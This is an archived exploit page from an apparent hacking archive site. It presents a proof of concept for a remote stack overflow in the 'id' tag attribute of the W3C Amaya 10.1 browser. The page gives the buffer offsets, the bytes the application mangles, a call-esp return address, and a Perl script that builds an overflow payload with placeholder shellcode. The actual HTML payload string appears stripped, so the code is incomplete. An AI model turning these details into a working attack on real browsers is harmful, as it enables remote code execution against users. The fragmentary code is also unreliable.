AOH :: HP Unsorted A :: VA1900.HTM

Amaya (id) Remote Stack Overflow Vulnerability



Amaya (id) Remote Stack Overflow Vulnerability
Amaya (id) Remote Stack Overflow Vulnerability



#            W3C Amaya 10.1 Web Browser
#
# Amaya (id) Remote Stack Overflow Vulnerability
#
# Written and discovered by: 
# r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au) 
#
# Advisory: http://www.bmgsec.com.au/advisory/41/ 
# ------------------------------------------------------
#
# Shellcode notes: 
# The application fails to correctly process certain bytes: 
# 0x9c becomes 0x9cc2
# Similar events occur with different bytes (0xf8, 0xfb, 0xbe, 0x93, 0xab, 0xaf 0xeb). 
#
# After reviewing the source code, the below function modifies the
# shellcode:  
# Line 902: int TtaWCToMBstring (wchar_t src, unsigned char **dest)
#
# The max value which can be used is 0x1fffff <-- Thanks Luigi!
# ------------------------------------------------------
#
# The "id" variable of a tag contains a buffer overflow: 
# 
r0ut3r
# # The application will not overflow with normal alphanumeric characters. # To fill the buffer I had to use "A/" repeated 91 times. Therefore buffer length is: # 91 * 2 = 182 + 4 # # [junk] + [eip] + [shellcode] # 182 + 4 + sizeof(shellcode) # # ESP points to data after EIP. # # "id" variable Proof of concept: #!/usr/bin/perl use warnings; use strict; my $shellcode = 'C' x 350; # 0x7D035F53 -> \x53\x5f\x03\x7d <-- Bingo! (call esp) my $data = '
test
'; print $data;

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.